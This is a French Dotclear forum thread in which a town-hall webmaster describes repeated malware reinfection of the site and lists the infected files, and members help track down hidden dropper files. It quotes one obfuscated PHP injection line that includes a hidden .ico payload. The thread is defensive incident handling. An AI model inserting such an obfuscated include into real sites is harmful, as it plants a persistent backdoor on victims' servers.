Vous n'êtes pas identifié(e).
13 février 2024 Sortie de Dotclear 2.29
Bonjour et meilleurs vœux à tous !
Depuis quelques semaines, le site web d’une petite mairie dont je m’occupe est attaqué par des intrusions de code malicieux dans Dotclear. Ce site est hébergé chez OVH.
À presque tous les niveaux, un fichier « index.php » est introduit, quand le fichier « index.php » existe déjà, ce même code est introduit au début :
<?php
/*77a56*/
@include "\057home\057ache\162es/w\167w/bl\157g/pu\142lic/\166ie_m\165nici\160ale/\05626b5\141a4f.\151co";
/*77a56*/(l’include est parfois très long, j’ai gardé en archive une partie des codes malicieux si nécessaire)
Ce fichier « index.php » trouvé même dans le dossier « dotclear/inc/ » contenant « config.php ».
J’ai effacé à plusieurs reprises ce code et ces « index.php » indésirables, j’ai modifié le code d’accès FTP du site et le mot de passe de la base Mysql, réinstallé un Dotclear clean, mais le code est réinjecté quelques heures après. La dernière intrusion date d’aujourd’hui vers 19h.
Je viens de modifier le code d’accès administratif webmaster de dotclear.
Trois personnes mettent à jour le site, dont moi, au niveau webmaster. Je vais demander à effectuer dès que possible un scan antivirus sur les machines des autres administrateurs, au cas où ils seraient infectés. Je n’ai rien trouvé de douteux chez moi, pour l’instant ?
J’ai vérifié les logs d’accès FTP sur le panel d’OVH, sauf erreur de ma part, je ne vois rien d’une intrusion externe, sauf mes corrections et ajouts.
En cherchant sur le web une solution, j’ai ajouté aux divers fichiers .htaccess le code suivant :
Options All -Indexes Il permettrait d’éviter le scan des contenues (ce serait plus fort qu’un simple fichier index.html vide), mais cela semble inutile ?
D’ailleurs là où j’ai mis un fichier « index.html » vide, il a été rebaptisé au moment de l'intrusion « index.html.bak.bak » et un fichier « index.php » ajouté à la place avec le code malicieux.
Depuis tous les réglages déjà cités, cela n’a rien changé. Je ne sais plus quoi faire.
Des personnes ayant visité le site à partir d’ordinateurs Windows ou Mac, ont eu des pages de pubs à la place de celles du site. Une personne ayant visité le site m’a appelée, après un scan de son ordinateur, elle avait un virus sur un installeur flashplayer ?
Je n’ai rien trouvé d’approchant sur ce problème dans le forum, sauf de vieux messages approchants datant de plus de sept ans, et sur le web, pareils, des intrusions sur WordPress datant aussi de plusieurs années.
Je ne vois pas où se situe la faille, pouvez-vous m’aider ?
Hors ligne
Bonjour,
J'ai déjà eu ce genre d'attaque et, comme toi, le changement de mots de passe n'avait pas suffit.
Ce qu'il me semble avoir compris, c'est qu'en plus des fichiers 'index.php', d'autres fichiers avaient été déposés qui servaient à appeler et rapatrier ces fichiers 'index.php'.
De mémoire, ça fait quelques années que cela était arrivé, il m'avait fallu traquer et supprimer tous les fichiers suspects en parcourant tous les répertoires.
Cela ne concernait pas dotclear mais joomla! et il y avait plusieurs sites hébergés sur l'hébergement de ce client. As-tu d'autres cms installés sur ton hébergement ?
Bonne journée.
A migré de dotclear 1.2.8 vers dotclear 2.3 le 28 mai 2011. Il essaie maintenant de comprendre ce que dotclear 2 lui apporte de plus.
Hors ligne
Merci de votre réponse.
Effectivement, le site de la mairie était sur le cms Drupal, une vieille version qui est restée en activité jusqu'au basculement sur Dotclear il y a un mois et demi. Pendant la préparation de la mise à jour, Dotclear était en accès non public pendant un an à peu près, le temps que les gens de la mairie apprennent à s'en servir et transfèrent les nouvelles données dessus.
Après le basculement j'ai désactivé Drupal, sans le supprimer tout de suite. Ce n'est qu'après m'être aperçu des intrusions que j'ai supprimé les fichiers de Drupal et vidé la base Mysql des données correspondantes.
Il ne reste sur la base de données Mysql, que les données d'un vieux logiciel de la bibliothèque municipale, et celles de Dotclear, mais il n'y plus rien sur le serveur de l'hébergement le concernant. J'attends de pouvoir contacter les gens s'occupant de la bibliothèque, pour pouvoir enlever les données.
Pensez-vous que la base Mysql serve de relais pour les intrusions ?
Hors ligne
Il n’y a plus rien de Drupal sur le serveur depuis plusieurs jours déjà, et le code malicieux a été réintroduit dans Dotclear hier vers 23h, c’est à dire toujours les jours une réinjection est faite.
Peut-on renforcé Dotclear avec un .htaccess ? ou dois-je le réinstaller encore une fois ?
A priori l’accès au serveur ne semble pas se faire par mode FTP ? Les logs ne me disent rien là-dessus ?
Que puis-je demander à OVH de vérifier au niveau du serveur ?
Je vais nettoyer la base Mysql et ne laisser que les registres de Dotclear.
J’ai trouvé un article sur le sujet préconisant un renforcement du code au niveau du serveur apache :
https://secupress.me/fr/blog/naidez-pas … index-php/
Qu’en pensez-vous ?
J’ai ajouté à l'installation du site les plugins suivant :
Contactez-moi (contactMe) 1.8.1
Colorbox (colorbox) 3.1
clean:config (cleanConfig) 1.4.3
EventHandler (eventHandler) 2019.04.05
externalLinks 3.4.0
GalleryInsert 0.412
homePageMode2 0.9-beta
Picture Title Update (pictureTitleUpdater) 0.2
Thumbnails Generator (thumbnailsGenerator) 0.9.1.1
Sitemaps (sitemaps) 1.3.3
Typo 1.9
Versions Manager 0.1.1
J’ai des doutes sur sitemao et EventHandler qui étaient fortement infectés pas ce code php malicieux (j'ai gardé les fichiers index.php concernés) ?
Merci de votre aide.
Hors ligne
Bonjour,
Selon moi, mais je ne suis pas expert, il se peut qu'un fichier ait été déposé et que ce soit lui qui s'occupe de générer de nouveaux fichiers malveillants.
Il faut traquer.
Cherche aussi dans les répertoires des images et vérifie bien qu'il n'y aurait pas de faux fichiers image.
Vérifie aussi les fichiers de dotclear. Il se pourrait que du code malveillant soit inséré à l'intérieur de ceux-ci.
Si c'est possible, tu sauvegardes tout le site, tu fais une vérification en local de l'intégralité des fichiers utilisateur (images et autres médias) puis tu effaces tout sur ton hébergement avant de procéder à une installation propre.
Vérifie aussi les droits d'accès sur les différents répertoires.
Bon courage.
A migré de dotclear 1.2.8 vers dotclear 2.3 le 28 mai 2011. Il essaie maintenant de comprendre ce que dotclear 2 lui apporte de plus.
Hors ligne
Après un scannage de tous les fichiers de Dotclear, voici la liste des documents contaminés :
Fichiers infectés :
www/blog/themes/customCSS/_config.php
www/blog/plugins/eventHandler/_install.php
www/blog/plugins/eventHandler/inc/class.eventhandler.public.widgets.php
www/dotclear/inc/core_error.php
www/dotclear/inc/admin/lib.themeconfig.php
www/dotclear/plugins/tags/tag_posts.php
www/index.php
www/dotclear/index.php
www/dotclear/admin/index.php
www/blog/plugins/sitemaps/index.php
Fichiers index.php et autres noms, ajoutés :
www/dotclear/themes/index.php
www/dotclear/public/index.php
www/dotclear/locales/index.php
www/dotclear/plugins/index.php
www/blog/plugins/index.php
www/blog/public/index.php
www/blog/themes/index.php
www/blog/index.php
www/dotclear/db/index.php
www/dotclear/inc/index.php
www/dotclear/var/index.php
www/blog/plugins/typo/locales/tepqocta.php
www/dotclear/plugins/simpleMenu/js/ttaxqial.php
www/dotclear/themes/default/wgkxavli.php
www/blog/themes/berlin/scss/yuobayqf.php
www/dotclear/plugins/blowupConfig/js/qrywvlzm.php
www/blog/plugins/externalLinks/fkpmwqmm.php
www/blog/plugins/externalLinks/tpl/guxlhjkr.php
www/dotclear/inc/dbschema/hssiqrvx.php
www/blog/plugins/externalLinks/tpl/amnhcbec.php
www/blog/themes/freelancer/tpl/awnzhkhr.php
www/blog/themes/berlin/scripts/bfkcozrx.php
www/blog/plugins/GalleryInsert/bkyevxms.php
Ainsi que des faux documents images invisibles au format .ico contenant un code à activer probablement après une action à distance :
www/blog/public/documents/.7de4ed1e.ico
www/blog/public/vie_municipale/.26b5aa4f.ico
Une nouvelle installation propre du site a été effectuée et j’attends de voir si cela va tenir (l’attaque se produit généralement dans la nuit).
J’ai conservé les fichiers contaminés et les tiens à votre disposition au cas où cela pourrait servir à améliorer la sécurité de Dotclear.
Je vous remercie de votre aide, cela m’a aidé à confirmer ce que je soupçonnais plus ou moins et je vous tiendrai au courant des éventuelles autres contaminations.
Dernière modification par caspal (2020-01-08 11:20:40)
Hors ligne
À titre informatif, je vous renvoie ce lien vers un article de 2018 abordant une infection très similaire à celle que j'ai constatée. Elle confirme l'usage de fichiers .php et .ico pour infecter le serveur :
Hors ligne
En lançant une analyse d'un des fichiers les plus corrompues de l'infection : www/dotclear/inc/core_error.php
avec l'aide de « virustotal.com », pas moins de 6 moteurs antivirus ont signalé un cheval de Troie de type : TrojWare.PHP.Crypt.BL@8c4feo
Dernière modification par caspal (2020-01-08 11:20:11)
Hors ligne
Deux nuits sans infections constatées depuis ma dernière intervention. A priori, tout se déclenchait bien depuis les fichiers introduits dans Dotclear.
Merci encore de votre aide !
Croisons les doigts.
De mes déboires passés, j'ai appris qu'il était dangereux de laisser un vieux cms non tenu à jour sur un hébergement.
A migré de dotclear 1.2.8 vers dotclear 2.3 le 28 mai 2011. Il essaie maintenant de comprendre ce que dotclear 2 lui apporte de plus.
Hors ligne
Vous n'êtes pas identifié(e).